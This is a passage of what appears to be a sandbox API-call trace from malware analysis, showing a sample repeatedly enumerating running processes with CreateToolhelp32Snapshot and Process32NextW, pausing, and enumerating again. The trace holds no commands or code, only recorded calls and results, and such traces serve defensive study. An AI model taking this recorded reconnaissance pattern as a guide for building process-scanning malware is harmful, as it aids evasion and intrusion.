th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.033] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.034] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.036] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.037] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.038] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.039] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0102.040] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.041] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.042] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.044] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.046] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.047] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.048] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.049] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.050] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.054] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.055] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.056] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.057] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0102.058] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.059] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.062] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.063] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.064] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.066] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.067] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.068] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.069] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.070] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0102.071] CloseHandle (hObject=0xbc) returned 1 [0102.071] Sleep (dwMilliseconds=0x12c) [0102.399] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0102.404] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0102.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0102.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0102.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, 
th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0102.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0102.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0102.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0102.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.414] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.414] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.415] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0102.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0102.418] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.419] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.420] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.422] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.423] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.424] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.425] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.426] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0102.428] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.429] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.430] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.431] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.432] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.433] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.434] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.435] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.437] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.438] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.486] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0102.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, 